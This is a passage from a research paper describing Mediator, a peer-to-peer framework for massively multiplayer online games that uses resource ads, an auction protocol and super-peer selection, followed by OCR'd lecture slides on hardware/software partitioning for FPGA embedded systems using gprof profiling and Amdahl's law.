match-makers working in parallel. Figure 1 shows the structure of a Mediator Resource Ad and Job Ad. 1) Descriptions of the Resource Ad - The Owner field contains a resource provider’s Id as a 128bit code. The PRI and Rep fields respectively indicate the resource provider’s current contribution points and reputation score. The CPU, RAM, and BW fields reflect a peer’s available processing power1, memory (KB) and network bandwidth (Kbps). A resource provider is able to specify a minimum job weight that it accepts in the Mini field, because on the one hand a powerful provider may not want to be bothered by tiny jobs, and on the other hand, less competent providers would be starved of contribution opportunities if all jobs in their power were seized by stronger peers. The LV field is a serialized HashMap with peer Ids as keys, and latency values as contents (more details are discussed in section 3.3.2). The Rank and Requirements fields are required by the ClassAds match-making mechanism. By the evaluation of those two fields, it is determined whether a given resource provider is able to host a specific job or not, and to what extent both Figure 1: Structures of Resource Ad and Job Ad A benchmark-based way of evaluating the performance of a CPU product is suggested for simplicity and compatibility. parties are a good match for each other. The last two fields, **Latency** and **Preference** are completed by the RM that carried out the match-making. A RM finishes the Resource Ad from the selected resource provider, and passes it to the IMM as a bid for the corresponding job (more details are discussed in section 3.3.2). 2) **Descriptions of the Job Ad** - The **Owner** field reflects a peer Id, for whom RMs should minimize latency while selecting resource providers. The owner of a specific job is determined by the IMM that issued the Job Ad, according to a game event prediction algorithm which is tightly related to in-game logistics and beyond the scope of this paper. The **TTL**, **Amount**, and **ObjectType** fields respectively represent the life time, the cardinality, and the type of a game object. These three fields will be used for a selected resource provider to initialize the game objects. The IMM can specify a **Mini** field in a Job Ad to restrict the minimum reputation score for a required resource provider, according to the significance of the game object to be hosted. The **Deadline** and **TimeStamp** fields are utilized by the deadline-driven auction protocol. Finally, **CPU**, **RAM** and **BW** fields describe the weight of a job. ### 3.3.2 Deadline-driven Auction (DA) Protocol Figure 2 represents the overall flow of control of the framework, where sub-regions are labelled by circled numbers to establish a connection between the diagram and corresponding texts that explain it. As discussed in section 3.1, a BM and an IMM work in a similar way to a Home Node and a Master Node in MOPAR. At the bootstrapping stage, a peer routes an enquiry message to the target Zone Id through the structured P2P overlay, which will be received and handled by the BM for that zone \(\mathcal{Z}\). If a ZM already existed in the zone, the BM would reply to the enquiry with the current ZM’s Id. Otherwise, the BM would promote the peer to be a provisional ZM \(\mathcal{Z}\), with a more capable ZM selected later on. Once a peer has successfully joined a game zone, it updates the IMM when its moving speed or direction are changed. In this way, the IMM obtains a global view of the zone-level game world, and is able to predict every peer’s position in the near future. Peers, whose Area of Interest (AOI) are going to overlap, will be notified by the IMM to establish direct P2P connections with each other, getting prepared for potential real-time interactions. In MOPAR, a Master Node is only required to predict player-vs.-player interactions. However, Mediator also requires an IMM to predict player-vs.-object events \(\mathcal{O}\), e.g. a player avatar is approaching a hidden spawn point of monsters and will trigger a game event that releases three dragons in the next five seconds. In abstract, given a frame interval \(T_{f}\), the IMM will predict the game events that satisfy \(E_t \in [T_f, 2T_f]\), where \(E_t\) is the estimated period of time before event \(E\) actually takes place, as well as a deadline before which the IMM must locate a capable resource provider to host the game objects involved in event \(E\), through cooperation with multiple RMs \(\mathcal{R}\). The process for locating a resource provider is directed by the DA protocol: I. After the bootstrapping stage, a peer enrols at the ZM to become a zone member. The ZM responds with an empty Latency Vector (LV) and the communication endpoint of a selected RM \(\mathcal{R}\). The empty LV contains a list of all existing zone members, but with all latency values set to infinity. The peer then starts to ping every other zone member to complete the LV. More up-to-date empty LVs will be issued by the ZM via a zone-level multicast for zone structure maintenance purposes. II. Once the peer has finished pinging a majority of the zone members, it may create a Resource Ad according to local load-management policy and upload it to the RM assigned by the ZM. Because what computing resources are available is transient information, the peer should update the RM when its resource availability is changed \(\mathcal{R}\). III. At the RM end, large numbers of Resource Ads may be received from peers that are currently attached to it. These Resource Ads are queued and wait to be accepted. Every time a RM receives a Resource Ad, it inspects the queue. If an existing Resource Ad from the same peer is identified, the previous Ad would be replaced by the new one. The RM also monitors the TTL of each entry in the queue, and removes stale Resource Ads \(\mathcal{R}\). IV. At the IMM end, game events are predicted, and Job Ads are created and delivered to multiple RM instances within the game zone. When an RM receives a Job Ad, it estimates how much time is left for match-making by subtracting the round-trip-time (RTT) from the deadline indicated by the Job Ad, and then finds out a most suitable resource provider from the local resource queue in a best efforts manner \(\mathcal{R}\). Because there will be real-time interaction between the selected resource provider and the resource consumer, the word “suitable” here mainly refers to a minimum latency, accompanied by other considerations such as a resource provider’s reputation and contribution. When it reaches the deadline for the match-making or the RM has finished examining all existing Resource Ads in the queue, a resource provider with the highest **Preference** value is selected as the most suitable one. V. Next, the RM completes the selected Resource Ad and uploads it to the IMM as a bid for the job. Because the IMM only aims at employing the best resource provider, it becomes an auction among the multiple RMs, and any less preferred bid is rejected immediately by the IMM \(\mathcal{O}\). In other words, the worst case for a RM is to wait for \(E_t - \frac{RTT}{2}\) time before confirming that its bid has won the auction. VI. Finally, the winning RM passes the Job Ad to the selected resource provider, and the latter will initialize the game objects accordingly \(\mathcal{O}\). If the game objects are stateless AI-controlled monsters, the resource provider can load the AI programs from a local copy of the game logic. Otherwise, if the game objects are stateful, the resource provider may acquire related information through a P2P MMOG persistence scheme such as was discussed in section 2.3. ### 3.4 Load-management #### 3.4.1 Peer-level Load-management Because Mediator adopts a pull-based scheduling strategy, every individual peer monitors its own computing resources and decides at what time to ask for new jobs, and how many jobs to ask for. The set of configuration parameters related to peer level scheduling is called the Contribution Enthusiasm, which controls the following aspects of a peer’s local scheduling behavior: 1) **The amount of dedicated resources** - A player is able to specify what percentage of its computing resources it would like to contribute to a P2P MMOG. To encourage voluntary contribution, the framework allows a player to... join the application as a dedicated contributor, when the player is not playing the game but the player’s computing resources are being utilized. 2) Pulling frequency and job selection - A peer can determine how often it uploads Resource Ads to a RM, and specify which job types it prefers, accepts, and refuses. The framework encourages stronger peers to seek a large bundle of jobs or to work as a super-peer, and leave the lesser jobs to weaker or slower to access peers. 3) Super-peer role solicitation - A peer can specify whether it is interested in super-peer jobs. If it is interested, the peer can evaluate its hardware configuration against the Reference Resource Ad (RRA) that is periodically issued by the ZM, to find out whether it is presently qualified for a super-peer role. According to the self-qualification result, the peer decides whether to register at the ZM as a super-peer backup. Generally speaking, a super-peer job would be better rewarded than a common resource contributor. However, a super-peer is required to commit to providing the service for a long enough gaming session, and if the peer violates this commitment, its reputation will be diminished. 3.4.2 Zone-level Load-management The zone-level load-management mechanism is designed to balance super-peer workloads approximately. Because a ZM is responsible for promoting various super-peers in the framework, zone-level load-management is mainly embodied by the ZM decision-making algorithms to promote adequate super-peers in a game zone, and prevent any super-peer from becoming overloaded. On the one hand, a ZM should maintain the super-peer to common peer ratio in a game zone to approximately a constant. Every time a new peer joins its zone, the ZM evaluates whether more super-peers are needed. If the answer is positive, the ZM would promote a given number of super-peers from a super-peer backup queue @. Moreover, it is also necessary for a ZM to monitor the length of the backup queue, in order to protect a game zone from super-peer paucity. The ZM will also regulate the length of the backup queue by tuning the super-peer qualification criteria specified in each RRA that it issues. On the other hand, each working super-peer should periodically report its workload to the ZM, and the ZM will either shift part of a heavy-loaded super-peer’s work to other super-peers, or just assign the lightly-loaded super-peers to new participants from then on @. Workload information can be delivered to a ZM when a super-peer periodically refreshes the ZM with knowledge of its existence. If a super-peer fails to report for a sufficient period of time, the ZM will assume that the super-peer has left the game zone silently, and replace the super-peer with a capable backup. 3.5 Super-peer Selection Super-peer selection is a common problem that emerges across a variety of P2P applications with many different selection protocols presented in the literature [17, 9]. In the Mediator framework, except for the BM that is a light-weight super-peer selected in a structured way, other Mediator roles are selected using a policy-based approach. Currently, the framework just suggests some fundamental policies and more application-specific ones can be flexibly introduced by different P2P MMOG designs. Policy 1 Only qualified, high performance peers can be selected as Mediators, unless the zone is bootstrapping when any peer can be selected as a provisional Zone Mediator, or during a resource paucity period when super-peer qualification criteria are temporally lowered. Policy 2 A ZM should avoid assigning multiple Mediator roles to a single peer, if other qualified candidates are available, unless the peer works as the BM for multiple game zones, or happens to be both a Mediator for its native zone, and a BM for a foreign zone. Policy 3 A relatively stable ratio between common peers and super-peers should be maintained, in order to prevent, on the one hand, any super-peer from being overloaded, and on the other hand, too many super-peers being promoted and sitting idle. 4. IMPLEMENTATION A proof-of-concept prototype for the Mediator framework is being built using FreePastry 2.0 and the ClassAds Java library 2.2. The prototype employs the Direct Simulator integrated in the FreePastry package, and has successfully simulated 1000 peers on an AMD 64 3000+ workstation with 2GB memory. The simulator takes in a table of float latency values that is generated by a standard network topology generator such as GT-ITM. According to the topology file, both the direct latency between two peers and the accumulated latency for routing a message through the P2P overlay are simulated. In the prototype, each peer is assigned a certain amount of virtual computing resources, and the local scheduling behaviours are simulated by a resource monitor stub. Preliminary experiment results indicate that various Mediator roles are allocated as peers join the application, zone structures are maintained correctly when peers moving from one zone to another, and the virtual computing resources owned by each peer are dynamically consumed by satisfying job requests. 5. CONCLUSION AND FUTURE WORK This paper presents Mediator, a novel P2P MMOG design framework that addresses four sub-issues - the reward scheme, distributed resource discovery, load-management, and super-peer selection. These issues are crucial to distribute the functionalities of a traditional game server, but have not been much addressed in the literature. In Mediator, game objects are hosted using player machines’ computing resources, and hence the MMOG scales better in both communication and computation. One avenue of future work is to complete experiments to validate and measure: 1) **Effectiveness** - Given a deadline ($T_F$) that is sufficiently long, a resource provider with an optimal **Preference** value should be located. 2) **Efficiency** - There should be a direct proportionality between $T_F$ and the **Preference** value, so that an efficient $T_F$ can be predicted to afford an acceptable **Preference**. 3) **Scalability** - All experiments will be repeated several times against different peer populations, to test whether the framework is scalable or not. 4) **Robustness** - Exceptional events, e.g., Mediators stopping functioning, will be simulated to test whether the framework is robust enough to recover from potential failures. The current prototype does not support load-management for Zone and Interest Management Mediators and future work will investigate algorithms for dynamic zoning, so that overcrowded game zones can be divided into disjoint or even parallel sub-zones, each with its own ZM and IMM. Similarly, sparsely populated game zones can be combined into a single zone that is controlled by a joint ZM and IMM. 6. REFERENCES
{"Source-Url": "https://pureapps2.hw.ac.uk/portal/files/416818/netgames.pdf", "len_cl100k_base": 6605, "olmocr-version": "0.1.50", "pdf-total-pages": 7, "total-fallback-pages": 0, "total-input-tokens": 22603, "total-output-tokens": 8271, "length": "2e12", "weborganizer": {"__label__adult": 0.0012531280517578125, "__label__art_design": 0.0009107589721679688, "__label__crime_law": 0.0015993118286132812, "__label__education_jobs": 0.0031986236572265625, "__label__entertainment": 0.0009975433349609375, "__label__fashion_beauty": 0.0006990432739257812, "__label__finance_business": 0.0011196136474609375, "__label__food_dining": 0.0016222000122070312, "__label__games": 0.11822509765625, "__label__hardware": 0.0032978057861328125, "__label__health": 0.002170562744140625, "__label__history": 0.0015497207641601562, "__label__home_hobbies": 0.0002582073211669922, "__label__industrial": 0.0011653900146484375, "__label__literature": 0.0010385513305664062, "__label__politics": 0.0008640289306640625, "__label__religion": 0.0013837814331054688, "__label__science_tech": 0.25439453125, "__label__social_life": 0.00040030479431152344, "__label__software": 0.031768798828125, "__label__software_dev": 0.568359375, "__label__sports_fitness": 0.0014934539794921875, "__label__transportation": 0.0011930465698242188, "__label__travel": 0.00091552734375}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 35322, 0.04087]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 35322, 0.36439]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 35322, 0.9177]], "google_gemma-3-12b-it_contains_pii": [[0, 1076, false], [1076, 6124, null], [6124, 12558, null], [12558, 18061, null], [18061, 25140, null], [25140, 29227, null], [29227, 35322, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1076, true], [1076, 6124, null], [6124, 12558, null], [12558, 18061, null], [18061, 25140, null], [25140, 29227, null], [29227, 35322, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 35322, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 35322, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 35322, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 35322, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 35322, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 35322, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 35322, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 35322, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 35322, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 35322, null]], "pdf_page_numbers": [[0, 1076, 1], [1076, 6124, 2], [6124, 12558, 3], [12558, 18061, 4], [18061, 25140, 5], [25140, 29227, 6], [29227, 35322, 7]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 35322, 0.0]]}
olmocr_science_pdfs
2024-12-01
2024-12-01
c576cdd405d571666e55afa1004aea526637f458
Embedded Systems Design with Platform FPGAs Partitioning Ron Sass and Andrew G. Schmidt http://www.rcs.uncc.edu/~rsass University of North Carolina at Charlotte Spring 2011 Chapter 4 — Partitioning Chapter 4 Learning Objectives Topics - partitioning hardware and software tasks; - formulation of an analytical solution; - pragmatic issues Problem Statement Given a Software Reference Design, how to decompose it into hardware and software components? Key Elements: - software reference design is often a sequential application - goal in an embedded system is to address one (or more) of the multi-faceted performance metrics (from chapter 1) - FPGA’s resources fungible but there is fixed total Our Approach - formulate the problem analytically - explore mathematical optimization of model - describe practical issues not accounted for in model assuming the software reference model is a sequential program, then **partitioning** is - the act of grouping sets of instructions, - mapping each group to either hardware or software, - implementing the groups destined for hardware in HDL, - creating the interfaces to transfer control back and forth Partitioning Feature A hardware group or cluster of instructions is called a **feature** once implemented in an HDL and added to a base system, a feature specializes the computer system architecture (hence the name — it becomes an architectural feature) - also know as a “computational kernel” or just “kernel” - idea is to solve the general problem by selecting suitable features from the program to be implemented in hardware - but the big question is “what are the suitable features?” Partitioning Profiling - to answer the question we need data - simplest way to collect data is to profile the software - reference design - gprof is a good, general-purpose profiler - sample-based profilers, such as gprof, work by - interrupting application at fixed time intervals - building a histogram from the program counters - keeping track of total run-time - afterwards, these data can be used characterize where “most of the time is spent” in a program - some profilers also keep track of the number of times a subroutine is invoked for `gprof`, the program is compiled with the the `-pg` option after execution, there is a `gmon.out` binary with the profile information the `gprof` command reads `gmon.out` and gives us a “human readable” version of the profile information in table form a handy Python script (Gprof2dot) combined with a graph layout application called GraphViz does an excellent job presenting the information graphically Simple Timing - the `time` command can be used get a general picture ``` % time ./simple real 1m14.991s user 0m21.959s sys 0m0.523s ``` - the first number is the “wall clock” time while the second and third represent the time spent computing in the program and operating system, respectively - the unaccounted for time was waiting for I/O ## AES gprof Output Each sample counts as 0.01 seconds. <table> <thead> <tr> <th>% cumulative</th> <th>time</th> <th>self</th> <th>self</th> <th>total</th> <th>name</th> </tr> </thead> <tbody> <tr> <td></td> <td>seconds</td> <td>seconds</td> <td>calls</td> <td>ms/call</td> <td>ms/call</td> </tr> <tr> <td>93.87</td> <td>8.12</td> <td>8.12</td> <td>14145726</td> <td>0.00</td> <td>0.00</td> </tr> <tr> <td>5.55</td> <td>8.60</td> <td>0.48</td> <td>27629</td> <td>0.02</td> <td>0.31</td> </tr> <tr> <td>0.29</td> <td>8.62</td> <td>0.03</td> <td>1</td> <td>25.00</td> <td>25.00</td> </tr> <tr> <td>0.29</td> <td>8.65</td> <td>0.03</td> <td></td> <td></td> <td></td> </tr> <tr> <td>0.00</td> <td>8.65</td> <td>0.00</td> <td>55282</td> <td>0.00</td> <td>0.00</td> </tr> <tr> <td>0.00</td> <td>8.65</td> <td>0.00</td> <td>93</td> <td>0.00</td> <td>0.00</td> </tr> <tr> <td>0.00</td> <td>8.65</td> <td>0.00</td> <td>1</td> <td>0.00</td> <td>0.00</td> </tr> <tr> <td>0.00</td> <td>8.65</td> <td>0.00</td> <td>1</td> <td>0.00</td> <td>0.00</td> </tr> <tr> <td>0.00</td> <td>8.65</td> <td>0.00</td> <td>1</td> <td>0.00</td> <td>0.00</td> </tr> <tr> <td>0.00</td> <td>8.65</td> <td>0.00</td> <td>1</td> <td>0.00</td> <td>0.00</td> </tr> <tr> <td>0.00</td> <td>8.65</td> <td>0.00</td> <td>1</td> <td>0.00</td> <td>0.00</td> </tr> <tr> <td>0.00</td> <td>8.65</td> <td>0.00</td> <td>1</td> <td>0.00</td> <td>0.00</td> </tr> <tr> <td>0.00</td> <td>8.65</td> <td>0.00</td> <td>1</td> <td>0.00</td> <td>0.00</td> </tr> </tbody> </table> Each sample counts as 0.01 seconds. <table> <thead> <tr> <th>% cumulative time</th> <th>seconds</th> <th>self seconds</th> <th>calls</th> <th>ms/call</th> <th>ms/call</th> <th>name</th> </tr> </thead> <tbody> <tr> <td>16.97</td> <td>2.42</td> <td>2.42</td> <td>20</td> <td>121.02</td> <td>121.02</td> <td>amp1</td> </tr> <tr> <td>16.83</td> <td>4.82</td> <td>2.40</td> <td>20</td> <td>120.02</td> <td>120.02</td> <td>amp2</td> </tr> <tr> <td>16.41</td> <td>7.16</td> <td>2.34</td> <td>20</td> <td>117.02</td> <td>117.02</td> <td>far2</td> </tr> <tr> <td>11.01</td> <td>8.73</td> <td>1.57</td> <td>20</td> <td>78.51</td> <td>78.51</td> <td>amp3</td> </tr> <tr> <td>10.94</td> <td>10.29</td> <td>1.56</td> <td>20</td> <td>78.01</td> <td>78.01</td> <td>far3</td> </tr> <tr> <td>10.66</td> <td>11.81</td> <td>1.52</td> <td>20</td> <td>76.01</td> <td>76.01</td> <td>far1</td> </tr> <tr> <td>4.70</td> <td>12.48</td> <td>0.67</td> <td>2920</td> <td>0.23</td> <td>0.23</td> <td>h_inner13</td> </tr> <tr> <td>2.88</td> <td>12.89</td> <td>0.41</td> <td>1920</td> <td>0.21</td> <td>0.21</td> <td>e_inner13</td> </tr> <tr> <td>2.52</td> <td>13.25</td> <td>0.36</td> <td>1</td> <td>360.05</td> <td>360.05</td> <td>grid</td> </tr> <tr> <td>1.82</td> <td>13.51</td> <td>0.26</td> <td>1</td> <td>260.04</td> <td>260.04</td> <td>tstep</td> </tr> <tr> <td>1.19</td> <td>13.68</td> <td>0.17</td> <td>778</td> <td>0.22</td> <td>0.22</td> <td>asuby</td> </tr> <tr> <td>1.05</td> <td>13.83</td> <td>0.15</td> <td>2</td> <td>75.01</td> <td>75.01</td> <td>initial</td> </tr> <tr> <td>0.98</td> <td>13.97</td> <td>0.14</td> <td>2</td> <td>70.01</td> <td>250.04</td> <td>SYMMLQ</td> </tr> <tr> <td>0.56</td> <td>14.05</td> <td>0.08</td> <td>2334</td> <td>0.03</td> <td>0.03</td> <td>DAXPY</td> </tr> <tr> <td>0.42</td> <td>14.11</td> <td>0.06</td> <td>1560</td> <td>0.04</td> <td>0.04</td> <td>DDOT</td> </tr> <tr> <td>0.42</td> <td>14.17</td> <td>0.06</td> <td>1</td> <td>60.01</td> <td>60.01</td> <td>free_space</td> </tr> <tr> <td>0.35</td> <td>14.22</td> <td>0.05</td> <td>1556</td> <td>0.03</td> <td>0.03</td> <td>DCOPY</td> </tr> <tr> <td>0.14</td> <td>14.24</td> <td>0.02</td> <td>10</td> <td>2.00</td> <td>2.00</td> <td>Je1</td> </tr> <tr> <td>0.07</td> <td>14.25</td> <td>0.01</td> <td>10</td> <td>1.00</td> <td>1.00</td> <td>Jm1</td> </tr> <tr> <td>0.07</td> <td>14.26</td> <td>0.01</td> <td>1</td> <td>10.00</td> <td>10.00</td> <td>rectangle</td> </tr> <tr> <td>0.00</td> <td>14.26</td> <td>0.00</td> <td>40</td> <td>0.00</td> <td>0.00</td> <td>wave</td> </tr> <tr> <td>0.00</td> <td>14.26</td> <td>0.00</td> <td>1</td> <td>0.00</td> <td>0.00</td> <td>tst_params</td> </tr> </tbody> </table> Partitioning AES and FDTD Analysis - the AES application, `aes_encrypt` took 93.87% of the time (very good) but it was invoked 14,145,726 times! - FDTD is a computational science application - six functions take most, but not all, of the execution time - however, each function was only invoked 20 times Amdahl’s Law - well known in computer architecture \[ \text{Speedup}_{\text{overall}} = \frac{1}{(1 - \text{Fraction}_{\text{enhanced}})} + \frac{\text{Fraction}_{\text{enhanced}}}{\text{Speedup}_{\text{enhanced}}} \] - So if only one feature implemented in FDTD: 20% speedup (max) - But if top six features implemented in FDTD: 5.8× speedup (max) Partitioning FDTD Gprof2dot/GraphViz main 100.00% (0.00%) amp1 16.97% (16.97%) 20× amp2 16.83% (16.83%) 20× far2 16.41% (16.41%) 20× amp3 11.01% (11.01%) 20× far3 10.94% (10.94%) 20× far1 10.66% (10.66%) 20× probes 7.57% (0.00%) 20× tem_y 3.51% (0.00%) 2× grid 2.52% (1.82%) 1× tstep 1.82% (1.82%) 1× initial 1.05% (1.05%) 2× h_inner13 4.70% (4.70%) 2920× e_inner13 2.88% (2.88%) 1920× solve_y 3.51% (0.00%) 2× SYMLQ 3.51% (0.98%) 2× asuby 1.19% (1.19%) 778× DAXPY 0.56% (0.56%) 2334× Another Graphical Example Partitioning Interpretation - armed with this information, the system designer can make some decisions - easy case: JPEG2000 - 11% reading source image - 89% encoding - in other cases though... - no computation dominates - limited FPGA resources - resources/feature varies - performance gain/feature varies some analysis gets us half-way there; then address the pragmatic concerns Basic Definitions - an application consists of collection of subroutines that are related via a (static) call graph - that is, - $C_i = (B_i, F_i)$ is a Control Flow Graph (CFG) that represents a subroutine - and the call graph is a graph of CFGs: $$A = (C, L)$$ where $L \subseteq C \times C$ - on the surface, it might seem easier to use a less complicated model — say, two groups (the hardware and software) — but this does not allow us to reason about discontinuous regions of hardware features Formally, we can define a partition of the *basic blocks* as follows. - let $\mathcal{S} = \{S_0, S_1, \ldots\}$ of some universal set $U$ of subsets of $U$ such that three conditions are met: - $\bigcup_{S \in \mathcal{S}} S = U$ - $\forall S, S' \in \mathcal{S} \mid S \cap S' = \emptyset$ - $\forall S \in \mathcal{S} \bullet S \neq \emptyset$ - in English, this says that every element in the universe appears in some subset, every element appears in only one subset, and that there are no empty subsets Partition Example The universe of $U = \{a, e, i, o, u, y\}$ could be partitioned into two subsets, $$\mathcal{X}_a = \{\{a, e, i, o, u\}, \{y\}\}$$ which is visually represented by: ![Diagram showing partitioning of the universe U] Partitioning An Application the same concept can be applied to an application - the universe is the collection of basic blocks - a *natural* partition groups the basic blocks by the subroutine they belong to \[ S = \left\{ \begin{array}{l} \{b_0, b_1, \ldots, b_i\}, \{b_i, b_{i+1}, \ldots\}, \ldots \{b_j, b_{j+1}, \ldots\} \end{array} \right\} \] - our job here is to reorganize contiguous basic blocks such that some are destined for hardware \[ \mathcal{X}' = \left\{ \begin{array}{l} \{b_j, b_{j+1}, \ldots\} \{b_k, b_{k+1}, \ldots\} \ldots \{b_0, b_1, \ldots, b_i\} \{b_i, b_{i+1}, \ldots\} \end{array} \right\} \] **software** **hardware** Now, we can define expected performance gain - first for the individual features - then collectively for the system This will give us a tool to weigh decisions and compare system choices. Defining Performance - as we know, performance is not scalar - rate-of-execution is common measure - but power, cost, and others are important to embedded systems Here, we will use rate-of-execution to demonstrate the concepts. There are four mechanisms for transferring control between hardware and software. <table> <thead> <tr> <th>Transfer from:</th> <th>Transfer to:</th> </tr> </thead> <tbody> <tr> <td>Software</td> <td>Hardware</td> </tr> <tr> <td>Subroutine call</td> <td>Go/done</td> </tr> <tr> <td>Interrupt</td> <td>Instantiation</td> </tr> </tbody> </table> **Partitioning** **Transfer of Control** Partitioning Cycles in Call Graph ![Call Graph Diagram] - main - gensurf - sar - feature - print - list - daxpy Embedded Systems Design with Platform FPGAs extern int m, b; int trans_and_inc ( int &x ) { int y; y = m * x + b; x++; return y; } int trans(int x, int m, int b) { int y; y = m * x + b; return y; } Trapped State — Many places in the memory hierarchy where data may reside — also known as serialization, it creates a temporary record to transfer data between hardware and software Partitioning Performance - Transfer speeds can be highly data dependent - DMA is usually best for large transfers - However, many features only need small transfers **Performance Quantified** - Application/OS/Hardware interfaces - Mmap avoids system call but does not allow the device to be shared ![Transaction speed by method](image-url) Chapter-In-Review - described the general problem - looked at specific profiling data - formulated an analytical solution - addressed pragmatic short comings of model Partitioning Chapter 4 Terms partitioning the process of decomposing an application into multiple implementations (such as hardware and software implementations) feature a portion of software that is a candidate for hardware implementation (by candidate we mean the hardware implementation is much faster than software implementation) interface is the set of rules that govern this interaction between two entities (for example, the interaction between a processor and an I/O device) Partitioning Chapter 4 Terms **marshaling** hardware and software implementations have different views of the state of the machine; marshaling is the process of explicitly organizing the transfer of state between the two **instrumentation** when a compiler or synthesis tool adds extra functionality to a task to help determine its characteristics within an application; for example, tasks are often instrumented to measure the amount of time spent completing the task or how much time is spent idle
{"Source-Url": "http://homepages.wmich.edu/~bazuinb/ECE5570/ch04_presenter.pdf", "len_cl100k_base": 4669, "olmocr-version": "0.1.50", "pdf-total-pages": 33, "total-fallback-pages": 0, "total-input-tokens": 51012, "total-output-tokens": 5583, "length": "2e12", "weborganizer": {"__label__adult": 0.0005946159362792969, "__label__art_design": 0.0007443428039550781, "__label__crime_law": 0.0005207061767578125, "__label__education_jobs": 0.0013284683227539062, "__label__entertainment": 9.757280349731444e-05, "__label__fashion_beauty": 0.0002884864807128906, "__label__finance_business": 0.0003578662872314453, "__label__food_dining": 0.0005574226379394531, "__label__games": 0.0010690689086914062, "__label__hardware": 0.0274658203125, "__label__health": 0.0008244514465332031, "__label__history": 0.0004189014434814453, "__label__home_hobbies": 0.00034046173095703125, "__label__industrial": 0.0017004013061523438, "__label__literature": 0.0002677440643310547, "__label__politics": 0.00037288665771484375, "__label__religion": 0.0007724761962890625, "__label__science_tech": 0.1602783203125, "__label__social_life": 9.79304313659668e-05, "__label__software": 0.0074005126953125, "__label__software_dev": 0.7919921875, "__label__sports_fitness": 0.0006036758422851562, "__label__transportation": 0.001621246337890625, "__label__travel": 0.0002872943878173828}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 12549, 0.14255]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 12549, 0.32613]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 12549, 0.82704]], "google_gemma-3-12b-it_contains_pii": [[0, 175, false], [175, 200, null], [200, 343, null], [343, 701, null], [701, 852, null], [852, 1155, null], [1155, 1646, null], [1646, 2196, null], [2196, 2607, null], [2607, 2974, null], [2974, 4065, null], [4065, 6286, null], [6286, 6596, null], [6596, 6952, null], [6952, 7452, null], [7452, 7492, null], [7492, 7874, null], [7874, 8386, null], [8386, 8902, null], [8902, 9139, null], [9139, 9793, null], [9793, 9983, null], [9983, 10213, null], [10213, 10507, null], [10507, 10667, null], [10667, 10861, null], [10861, 10936, null], [10936, 11044, null], [11044, 11211, null], [11211, 11388, null], [11388, 11556, null], [11556, 12047, null], [12047, 12549, null]], "google_gemma-3-12b-it_is_public_document": [[0, 175, true], [175, 200, null], [200, 343, null], [343, 701, null], [701, 852, null], [852, 1155, null], [1155, 1646, null], [1646, 2196, null], [2196, 2607, null], [2607, 2974, null], [2974, 4065, null], [4065, 6286, null], [6286, 6596, null], [6596, 6952, null], [6952, 7452, null], [7452, 7492, null], [7492, 7874, null], [7874, 8386, null], [8386, 8902, null], [8902, 9139, null], [9139, 9793, null], [9793, 9983, null], [9983, 10213, null], [10213, 10507, null], [10507, 10667, null], [10667, 10861, null], [10861, 10936, null], [10936, 11044, null], [11044, 11211, null], [11211, 11388, null], [11388, 11556, null], [11556, 12047, null], [12047, 12549, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 12549, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 12549, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 12549, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 12549, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, true], [5000, 12549, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 12549, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 12549, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 12549, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 12549, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 12549, null]], "pdf_page_numbers": [[0, 175, 1], [175, 200, 2], [200, 343, 3], [343, 701, 4], [701, 852, 5], [852, 1155, 6], [1155, 1646, 7], [1646, 2196, 8], [2196, 2607, 9], [2607, 2974, 10], [2974, 4065, 11], [4065, 6286, 12], [6286, 6596, 13], [6596, 6952, 14], [6952, 7452, 15], [7452, 7492, 16], [7492, 7874, 17], [7874, 8386, 18], [8386, 8902, 19], [8902, 9139, 20], [9139, 9793, 21], [9793, 9983, 22], [9983, 10213, 23], [10213, 10507, 24], [10507, 10667, 25], [10667, 10861, 26], [10861, 10936, 27], [10936, 11044, 28], [11044, 11211, 29], [11211, 11388, 30], [11388, 11556, 31], [11556, 12047, 32], [12047, 12549, 33]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 12549, 0.14754]]}
olmocr_science_pdfs
2024-11-28
2024-11-28
c0bcff04298d753834e980ca9765eae6827b4f5d
